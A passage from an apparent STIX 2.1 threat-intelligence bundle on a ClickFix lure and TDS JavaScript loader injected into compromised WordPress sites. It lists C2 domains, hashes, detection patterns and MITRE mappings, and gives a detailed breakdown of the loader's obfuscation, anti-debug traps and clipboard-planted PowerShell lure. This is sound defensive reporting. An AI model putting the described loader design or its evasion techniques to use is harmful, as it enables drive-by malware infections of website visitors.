      "target_ref": "malware--4f6c20d5-4b2f-449a-8c40-72a4cfad8d59"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3ed4414b-2116-4a90-b9e7-675e2746fd39",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "indicates",
      "source_ref": "indicator--9d0cdcaf-5c80-48fe-bb5e-761dc1acea81",
      "target_ref": "malware--4f6c20d5-4b2f-449a-8c40-72a4cfad8d59"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--93ea5142-2f6f-42f7-9307-26b1b2bc9d46",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "attributed-to",
      "source_ref": "campaign--6602b80a-c500-4017-9815-36848af024e0",
      "target_ref": "threat-actor--9537c8dd-8a4f-470c-a27b-7c86fca335b1"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fab38401-db8e-4e1f-bd8d-06aa023cf2bc",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--9537c8dd-8a4f-470c-a27b-7c86fca335b1",
      "target_ref": "attack-pattern--30f20f37-3252-4ba7-a7ec-5801184cc078"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5e404a92-489a-41e1-9016-ce864d34990b",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--9537c8dd-8a4f-470c-a27b-7c86fca335b1",
      "target_ref": "attack-pattern--24a98d95-0ecc-42a1-adae-3124fc5af164"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--683c953a-3ca1-4e9a-a955-0018e3da6fb5",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--9537c8dd-8a4f-470c-a27b-7c86fca335b1",
      "target_ref": "attack-pattern--10ec9dcd-f7f1-4e00-aea2-f48b8236eaf4"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--77882769-bd05-4642-8181-8754bada72c8",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--9537c8dd-8a4f-470c-a27b-7c86fca335b1",
      "target_ref": "attack-pattern--e3492bdf-28a4-4651-861c-84b205b1c740"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--26ef64c3-6106-415c-8820-3c80bac3d45c",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--9537c8dd-8a4f-470c-a27b-7c86fca335b1",
      "target_ref": "attack-pattern--008b5d30-4100-44e2-9557-79307c836574"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4efcf276-b503-4865-9597-84ebd0bb6424",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--9537c8dd-8a4f-470c-a27b-7c86fca335b1",
      "target_ref": "attack-pattern--7f8e5085-ed68-42b9-9056-b395331f9096"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--85370973-876c-417c-9060-006b4874ff3a",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--9537c8dd-8a4f-470c-a27b-7c86fca335b1",
      "target_ref": "attack-pattern--83552909-7093-498f-bd03-51fa30e434db"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ebe8848e-4cb8-4bd1-ba09-9c8fc0e2b44d",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--9537c8dd-8a4f-470c-a27b-7c86fca335b1",
      "target_ref": "attack-pattern--8e3f00c4-508d-403b-a1e6-ef8dbfa69ddf"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6b680118-1fd4-42e8-a5c7-2f1fc9f260e9",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--9537c8dd-8a4f-470c-a27b-7c86fca335b1",
      "target_ref": "attack-pattern--20faa53e-ad48-4eb3-86da-f3bffcdc490b"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d409bd31-0b75-4611-994c-fe22e142066e",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--9537c8dd-8a4f-470c-a27b-7c86fca335b1",
      "target_ref": "attack-pattern--2115dee5-998e-44fd-a87f-af914112a548"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6a85f10c-5a97-44b2-a2d7-86333f73bba4",
      "created": "2026-05-19T00:00:00.000Z",
      "modified": "2026-05-19T00:00:00.000Z",
      "relationship_type": "uses",
      "source_ref": "threat-actor--9537c8dd-8a4f-470c-a27b-7c86fca335b1",
      "target_ref": "attack-pattern--4221a565-d330-4a37-b682-bd8afea876b6"
    },
    {
      "type": "threat-actor",
      "spec_version": "2.1",
      "id": "threat-actor--380ce122-ec58-4108-a29a-94f24790b4bd",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "TDS Cluster \u2014 AS202412 / ntdnewtds infrastructure (V3 / May 6 build)",
      "description": "Same threat cluster as SL-ADV-007 V1/V2. This May 6 build (V3) predates both. Shares core TTPs: window.__performance_optimizer_v6 guard, synchronous XHR to TDS endpoints, document.createElement('script') injection into document.head, setInterval debugger trap at 4000ms, Function.constructor sandbox escape probe. V3 is the most feature-complete variant observed: includes a full production-grade multilingual ClickFix lure engine supporting 50+ languages with per-locale UI strings, localStorage-based deduplication, Shadow DOM overlay rendering, 240-second auto-dismiss timer, and window.addEventListener message-channel communication. TDS endpoints use /jsrepo path (as V1) with same cache-busting pattern.",
      "threat_actor_types": [
        "criminal",
        "financially-motivated"
      ],
      "sophistication": "advanced",
      "resource_level": "individual",
      "primary_motivation": "financial-gain",
      "aliases": [
        "AS202412 TDS Actor",
        "SL-ADV-007 cluster"
      ],
      "labels": [
        "clickfix",
        "tds",
        "multilingual",
        "shadow-dom",
        "infostealer"
      ]
    },
    {
      "type": "campaign",
      "spec_version": "2.1",
      "id": "campaign--165c2be8-c4d6-4389-9a30-88d5d589f88f",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "SL-ADV-007-V3: TDS Cluster \u2014 Earliest Build (May 6), Full ClickFix Lure Engine",
      "description": "May 6 build of the SL-ADV-007 TDS cluster. Full self-contained ClickFix engine with Shadow DOM overlay, 50-language support, localStorage/cookie victim tracking, and 240-second auto-dismiss. RC4+Base64 obfuscation throughout (17,914 strings). Predates V1 and V2. Establishes the baseline capability set for the cluster.",
      "first_seen": "2026-05-06T00:00:00Z",
      "last_seen": "2026-05-06T00:00:00Z",
      "labels": [
        "clickfix",
        "shadow-dom",
        "multilingual",
        "tds",
        "v3",
        "earliest"
      ]
    },
    {
      "type": "malware",
      "spec_version": "2.1",
      "id": "malware--1e5b20ef-8419-4d22-b0c1-60dbdb82bba3",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "TDS Stage-1 JS Loader + ClickFix Lure Engine \u2014 Variant 3 (May 6 build)",
      "description": "Earliest variant of the V1/V2/V3 loader set in the SL-ADV-007 cluster; the March 20 proto-build (threat-actor--e76f621b-4465-4edc-8485-8c1665ccc163) predates it and already carries the same core TTPs. Dated May 6 2026. 829,828 bytes. 3,272 lines (post dead-code removal). Single combined file: TDS loader + full ClickFix lure engine in one payload. \n\nCIPHER: RC4+Base64 via _0x5656 decoder. String array _0x59bb: 17,914 entries. Rotation offset: 311,002. Base offset: -196. \n\nSTRUCTURE (line ranges as recorded in the analysis notes; the header, string-array and bootstrap ranges overlap and should be re-verified against the sample):\n- Lines 1-8: file header / semicolon\n- Lines 2-144: string array _0x59bb (17,914 encoded entries)\n- Line 9: array rotation bootstrap IIFE (_0x59bb, 311002)\n- Line 145: decoder function _0x5656 (RC4+Base64)\n- Lines 316-399: anti-debug IIFE (calls _0x49af34 integrity checker)\n- Lines 400-644: once-wrapper factory _0x5374df + console-override anti-debug\n- Lines 645-3197: main ClickFix lure engine IIFE (2,553 lines)\n  - Lines 646-2194: config dictionary (150+ encoded string properties)\n  - Lines 2133-2194: 60-locale localization map (50+ languages: en/es/fr/de/ru/zh/ja/pt/it/nl/pl/tr/ar/uk/vi/ko/ro/th/hu/cs/sv/no/da/fi/he/id/ms/sk/sr/hr/lt/lv/et/el/fa/ur/bg/az/sq/ka/hy/mk/kk/uz/ps/am/sw/ha/yo/ig/mn/lo/si/ta/te/kn/ml/pa/gu/or)\n  - Lines 2195-2199: document body/head style manipulation (opacity/padding/margin reset)\n  - Lines 2200-3197: payload functions:\n    _0x466e6: localStorage dedup check + document.referrer fingerprint\n    _0x27ea40: DOM element creator for overlay\n    _0x121d95: language detector (navigator.language \u2192 locale lookup)\n    _0x5397f8: TDS XHR caller (XMLHttpRequest GET /jsrepo?rnd=, synchronous, 3 endpoints)\n    _0x4fe5d4: Script injector (createElement('script'), .text=responseText, head.appendChild)\n    _0x50e295: Shadow DOM overlay builder (creates host element, attachShadow, builds CAPTCHA UI)\n    _0x587964: ClickFix lure renderer (per-locale strings, fake Cloudflare branding, clipboard.writeText)\n    _0x33532a: setTimeout 240000ms auto-dismiss (removes overlay after 4 min)\n    _0x3a8acb: Cookie setter + localStorage persistence (marks victim as seen)\n    _0x3b6d88: DOM cleanup + setTimeout removal handler\n    _0x194b13: window.addEventListener message-channel handler\n    _0x110bc6: Entry point / orchestrator\n- Lines 3198-3220: constructor escape + setInterval(_0x12b9ec, 4000) debugger trap\n- Lines 3221-3271: _0x12b9ec debugger trap function\n\n\nKEY BEHAVIOURS:\n1. Checks window.__performance_optimizer_v6 guard\n2. Checks localStorage key (dedup \u2014 won't re-show to already-seen victims)\n3. Checks document.referrer for fingerprinting\n4. Fires synchronous XHR to TDS /jsrepo endpoint, injects response as script\n5. Detects navigator.language, looks up per-locale UI strings from the 60-locale map\n6. Builds Shadow DOM host element, attaches shadow root\n7. Renders fake Cloudflare CAPTCHA overlay with locale-correct text\n8. On user interaction: clipboard.writeText(PowerShell_payload)\n9. Sets cookie + localStorage to mark victim as seen\n10. Sets 240-second auto-dismiss timer on overlay\n11. Registers window message-channel listener for inter-frame comms\n",
      "malware_types": [
        "trojan",
        "dropper"
      ],
      "is_family": false,
      "labels": [
        "tds",
        "clickfix",
        "stage1",
        "rc4-b64",
        "shadow-dom",
        "multilingual",
        "50-languages",
        "localStorage",
        "v3",
        "earliest-build"
      ],
      "architecture_execution_envs": [
        "browser"
      ],
      "implementation_languages": [
        "javascript"
      ],
      "capabilities": [
        "anti-debugging",
        "anti-vm",
        "remote-code-execution",
        "obfuscated-payloads",
        "user-interface-spoofing"
      ]
    },
    {
      "type": "note",
      "spec_version": "2.1",
      "id": "note--77653f1f-5659-4737-9088-663c4f944ab2",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "abstract": "V3 is the earliest of the V1/V2/V3 builds (May 6; the March 20 proto-build predates it) \u2014 cluster timeline reconstruction",
      "content": "Chronological ordering of the V1/V2/V3 loader builds in the SL-ADV-007 cluster, based on file dates and feature delta. This note does not cover the March 20 proto-build (threat-actor--e76f621b-4465-4edc-8485-8c1665ccc163), which predates V3 by 47 days and carries the same core TTPs.\n\nV3 (stuff2.js, May 6): Earliest of the three builds compared here. Full ClickFix lure engine embedded, 17,914 string entries, Shadow DOM overlay, 60-locale (50+ language) localization, localStorage+cookie victim tracking, 3-endpoint TDS via /jsrepo. Most feature-complete lure UI. Fully obfuscated.\n\nV1 (god-help-me.js/stuff.js, ~May 12-18): Standalone loader only. 39,565 string entries (larger array, likely more evasion code). /jsrepo path. 2 TDS endpoints. 4 anti-debug layers. No lure UI included \u2014 lure fetched from TDS.\n\nV2 (stuff1.js, ~May 18): Cleartext loader, bundle-prepend delivery. /teamrepo path. 3 TDS endpoints (sdntds.shop added). 758 string entries (anti-debug only). Loader deliberately deobfuscated \u2014 operator may have determined cleartext loader is harder to detect than a 1MB obfuscated blob.\n\nEvolution pattern: V3\u2192V1\u2192V2 shows loader-lure separation (V1 offloads lure to TDS), infrastructure expansion (new domain in V2), and delivery sophistication increase (bundle hijack in V2). The 60-locale lure in V3 was likely stripped out into the TDS-served second stage by V1/V2 to reduce injected payload size.\n\nShared fingerprints across all 3: window.__performance_optimizer_v6, synchronous XHR + createElement('script') + .text + head.appendChild, Math.random() cache-buster, setInterval(trap, 4000), Function.constructor('return this') escape, RC4+Base64 cipher, _0x59bb/_0x490f array fn names.",
      "object_refs": [
        "malware--1e5b20ef-8419-4d22-b0c1-60dbdb82bba3",
        "threat-actor--380ce122-ec58-4108-a29a-94f24790b4bd"
      ]
    },
    {
      "type": "infrastructure",
      "spec_version": "2.1",
      "id": "infrastructure--72208d1e-6df5-4090-90e0-a9649a04eca4",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "ntdnewtds.shop \u2014 Primary TDS C2 (all variants)",
      "description": "Primary TDS endpoint shared across V1, V2, V3. V1/V3 use /jsrepo path; V2 uses /teamrepo.",
      "infrastructure_types": [
        "command-and-control"
      ],
      "labels": [
        "tds",
        "c2",
        "shared",
        "ntdnewtds",
        "all-variants"
      ]
    },
    {
      "type": "infrastructure",
      "spec_version": "2.1",
      "id": "infrastructure--4746914e-fdfb-4255-9157-0ce196797500",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "dnsnewtds.shop \u2014 Fallback TDS C2 (all variants)",
      "description": "Fallback TDS endpoint shared across V1, V2, V3.",
      "infrastructure_types": [
        "command-and-control"
      ],
      "labels": [
        "tds",
        "c2",
        "shared",
        "dnsnewtds",
        "all-variants"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--9e6c793a-8388-4297-8ed2-4474c868f335",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "File: stuff2.js \u2014 V3 May-6 build (829,828 bytes)",
      "description": "Earliest of the V1/V2/V3 SL-ADV-007 loader builds (the March 20 proto-build predates it). Full ClickFix engine + TDS loader, 3,272 lines, 17,914 string array entries.",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[file:hashes.MD5 = 'c67211d946c6762bbef2afdb74c63416' OR file:hashes.'SHA-1' = 'dcfb29698a73656e60a329274ecc5833f92517ad' OR file:hashes.'SHA-256' = '1d9d37f90fa60b93647a845ff39f64ff7e7f71f6f2a576780fbe974064a907b1']",
      "pattern_type": "stix",
      "valid_from": "2026-05-06T00:00:00.000Z",
      "labels": [
        "v3",
        "may-6",
        "file-hash",
        "earliest-build"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--187c8ef4-e9bf-4100-822e-894f0193b30f",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "Domain: ntdnewtds.shop (all variants)",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[domain-name:value = 'ntdnewtds.shop']",
      "pattern_type": "stix",
      "valid_from": "2026-05-06T00:00:00.000Z",
      "labels": [
        "tds",
        "c2",
        "shared"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--b25b0d59-610b-4479-8152-ad8d430393e6",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "Domain: dnsnewtds.shop (all variants)",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[domain-name:value = 'dnsnewtds.shop']",
      "pattern_type": "stix",
      "valid_from": "2026-05-06T00:00:00.000Z",
      "labels": [
        "tds",
        "c2",
        "shared"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--06ebe711-e144-41c8-b6ed-976a9b5049fc",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "URL pattern: /jsrepo?rnd= (V1 + V3)",
      "description": "TDS payload delivery path shared between V1 and V3. V2 uses /teamrepo. Coverage note: the pattern matches only the two decoded domains (ntdnewtds.shop, dnsnewtds.shop); the third V3 fallback endpoint is still encoded and is not covered, so a miss on this pattern does not rule out V3 activity.",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[url:value MATCHES '^https?://(ntd|dns)newtds\\.shop/jsrepo\\?rnd=']",
      "pattern_type": "stix",
      "valid_from": "2026-05-06T00:00:00.000Z",
      "labels": [
        "tds",
        "jsrepo",
        "v1",
        "v3"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--47cce175-2625-4713-aa42-5b7bfa35ed01",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "JS artifact: window.__performance_optimizer_v6 guard (all variants)",
      "description": "Shared deduplication guard present across V1, V2, V3. Strong attribution indicator.",
      "indicator_types": [
        "malicious-activity",
        "anomalous-activity"
      ],
      "pattern": "[file:content MATCHES '__performance_optimizer_v6']",
      "pattern_type": "stix",
      "valid_from": "2026-05-06T00:00:00.000Z",
      "labels": [
        "shared-ioc",
        "all-variants",
        "attribution",
        "dedup-guard"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--13f0aada-9f92-48db-a400-084ec547cb57",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "Behaviour: localStorage dedup key + cookie persistence (V3-specific)",
      "description": "V3 writes a localStorage key after showing overlay to prevent re-display to the same victim. Also sets document.cookie with expiry. Enables victim tracking across sessions. DETECTION NOTE: the attached STIX pattern ([network-traffic:dst_ref.type = 'domain-name']) is a placeholder \u2014 it matches any network traffic with a domain-name destination and carries no V3-specific content. Do not deploy it for detection or blocking; the behaviour is only observable client-side (localStorage key + cookie write) and the concrete key and cookie names are not recorded here.",
      "indicator_types": [
        "malicious-activity",
        "anomalous-activity"
      ],
      "pattern": "[network-traffic:dst_ref.type = 'domain-name']",
      "pattern_type": "stix",
      "valid_from": "2026-05-06T00:00:00.000Z",
      "labels": [
        "victim-tracking",
        "localStorage",
        "cookie",
        "v3"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--eecca675-f1c7-4c72-b8c9-bf481b1e767c",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "Behaviour: Shadow DOM overlay for ClickFix CAPTCHA rendering (V3)",
      "description": "V3 builds CAPTCHA lure UI inside a Shadow DOM host element (attachShadow). This isolates the malicious overlay from page CSS and makes DOM inspection harder. Auto-dismisses after 240,000ms (4 minutes). Registers window.addEventListener for message-channel inter-frame comms. DETECTION NOTE: attachShadow is a standard Web Components API used by many legitimate pages; the attached pattern is a correlation/hunting aid with a high false-positive rate and should not be used for standalone blocking.",
      "indicator_types": [
        "malicious-activity",
        "anomalous-activity"
      ],
      "pattern": "[file:content MATCHES 'attachShadow']",
      "pattern_type": "stix",
      "valid_from": "2026-05-06T00:00:00.000Z",
      "labels": [
        "shadow-dom",
        "v3",
        "clickfix-overlay",
        "evasion"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--9f4605b2-917e-4844-b228-26c8e2659e4c",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "Behaviour: 50-language localization map in ClickFix lure (V3)",
      "description": "V3 contains a 60-locale (50+ language) localization dictionary (en/es/fr/de/ru/zh/ja/pt/it/nl/pl/tr/ar/uk/vi/ko/ro/th/hu/cs/sv/no/da/fi/he/id/ms/sk/sr/hr/lt/lv/et/el/fa/ur/bg/az/sq/ka/hy/mk/kk/uz/ps/am/sw/ha/yo/ig/mn/lo/si/ta/te/kn/ml/pa/gu/or). navigator.language used for locale detection. Indicates global targeting ambition. DETECTION NOTE: navigator.language is ubiquitous in benign scripts; the attached pattern is high-noise and suitable only for correlation alongside the __performance_optimizer_v6 guard and the TDS domain indicators.",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[file:content MATCHES 'navigator.language']",
      "pattern_type": "stix",
      "valid_from": "2026-05-06T00:00:00.000Z",
      "labels": [
        "multilingual",
        "50-languages",
        "global-targeting",
        "v3",
        "clickfix"
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5552b4e5-d69a-4def-b51d-15f7e14deaef",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "T1059.007 \u2014 Command and Scripting Interpreter: JavaScript",
      "description": "V3 is a fully JS-implemented TDS loader + ClickFix lure engine. Synchronous XHR fires at page load; response injected as inline script into document.head.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1059/007",
          "external_id": "T1059.007"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--06a150f4-ffa1-47e4-beb4-7cc91f50c537",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "T1027 \u2014 Obfuscated Files or Information",
      "description": "RC4+Base64 cipher via _0x5656 decoder. 17,914-entry string array (_0x59bb), rotation 311,002, base offset -196. Largest string array in the observed cluster.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1027",
          "external_id": "T1027"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--114e81d2-b996-4d5f-a9b1-d55e78b79aa8",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "T1027.010 \u2014 Command Obfuscation",
      "description": "All TDS endpoint URLs, DOM method names, CSS properties, locale strings encoded. No plaintext strings survive in V3 (unlike V2 cleartext loader). Mapping caveat: this describes RC4+Base64-encoded strings inside the JavaScript file, not obfuscation of an executed command line; T1027.013 (Encrypted/Encoded File) is the closer sub-technique. T1027.010 applies to the clipboard-delivered PowerShell one-liner only if that command is itself obfuscated, which is not established here.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1027/010",
          "external_id": "T1027.010"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4dab7fa0-6671-4954-bbf8-78df78f4f939",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "T1497.001 \u2014 Virtualization/Sandbox Evasion: System Checks",
      "description": "setInterval(_0x12b9ec, 4000) debugger trap + Function.constructor('return this') escape. Separate anti-debug IIFE at line 316 calls _0x49af34 integrity checker. Once-wrapper factory _0x5374df for console-override layer. Mapping caveat: every check listed here targets an attached debugger or devtools console, not a virtual machine or sandbox; T1622 (Debugger Evasion) is the more accurate technique. No VM-detection logic is documented for V3, so the 'anti-vm' capability on the malware object should be treated as unverified.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1497/001",
          "external_id": "T1497.001"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--f3f3c056-4cf8-469e-8ea2-3529b7c656ad",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "T1189 \u2014 Drive-by Compromise",
      "description": "Injected into compromised WordPress sites serving cannabis/dispensary content.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1189",
          "external_id": "T1189"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--365dbf0a-4202-4c24-9205-4e8455a93a55",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "T1203 \u2014 Exploitation for Client Execution",
      "description": "Shadow DOM fake Cloudflare CAPTCHA overlay. clipboard.writeText(PowerShell_payload). User executes via Win+R \u2192 paste \u2192 OK. Locale-aware lure text for 50+ languages. Mapping caveat: no software vulnerability is exploited \u2014 execution depends entirely on the victim pasting and running the clipboard contents. T1204 (User Execution; Malicious Copy and Paste sub-technique) is the accurate technique; T1203 is retained here only for continuity with earlier SL-ADV-007 versions.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1203",
          "external_id": "T1203"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--bf614ebf-b976-44e2-ab21-869b2d5108cc",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "T1566.002 \u2014 Phishing: Spearphishing Link",
      "description": "Victims arrive organically or are lured to compromised dispensary sites. Mapping caveat: the observed delivery is drive-by injection into compromised sites (T1189, mapped separately); no targeted email or messaging lure has been documented for this cluster. Retain this technique only if a spearphishing-link vector is confirmed.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1566/002",
          "external_id": "T1566.002"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3c2812fc-e9a1-4ae8-bf5a-9e1c5398cdb9",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "T1140 \u2014 Deobfuscate/Decode Files or Information",
      "description": "All strings decoded at runtime via RC4+Base64. TDS URLs decoded via atob() calls within decoded strings.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1140",
          "external_id": "T1140"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--905c00c3-d29c-45ae-a260-c7fad3edeea8",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "T1104 \u2014 Multi-Stage Channels",
      "description": "TDS 3-endpoint fallback chain: ntdnewtds.shop \u2192 dnsnewtds.shop \u2192 third endpoint (encoded). Synchronous XHR GET /jsrepo?rnd= with Math.random() cache-buster.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1104",
          "external_id": "T1104"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--821c74bc-675b-45a3-a335-865f1199c00d",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "T1185 \u2014 Browser Session Hijacking (Victim Tracking)",
      "description": "V3 stores victim-seen state in both localStorage key and document.cookie with expiry. Prevents repeat overlay display; the most plausible purpose is to avoid re-prompting victims who have already seen the lure. Mapping caveat: T1185 covers man-in-the-browser interception of an authenticated session; writing the actor's own deduplication state does not match it, and no access to existing session data is documented for V3. Consider reclassifying this as a tracking/deduplication behaviour rather than a session-hijacking technique.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1185",
          "external_id": "T1185"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--b9f4edaa-4e36-491a-a2da-9e915da92c16",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "T1539 \u2014 Steal Web Session Cookie",
      "description": "Reading and writing document.cookie as part of victim-state tracking. Mapping caveat: the V3 loader sets and reads its own tracking cookie on the compromised site; no collection or exfiltration of existing session cookies is documented at this stage. Cookie theft in this cluster, if any, belongs to the downstream browser-stealer stage (chrome/FF) described in the V1 callchain, not to this object.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1539",
          "external_id": "T1539"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--73d46035-d53f-43ac-a23e-1587e08a7c43",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "T1608.002 \u2014 Stage Capabilities: Upload Tool",
      "description": "Remote JS second-stage payload hosted at TDS /jsrepo endpoint, served on-demand. Mapping caveat: the staged artefact is a malicious second-stage script rather than a dual-use tool, so T1608.001 (Upload Malware) is the closer sub-technique.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1608/002",
          "external_id": "T1608.002"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--69a5272e-3422-400a-b74b-d74877c3b104",
      "created": "2026-05-06T00:00:00.000Z",
      "modified": "2026-05-06T00:00:00.000Z",
      "name": "T1055.001 \u2014 Process Injection via delivered PS payload",
      "description": "Downstream PowerShell chain injects TR/Rozena.Gen into svchost.exe (as documented in SL-ADV-007 V1 callchain).",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1055/001",
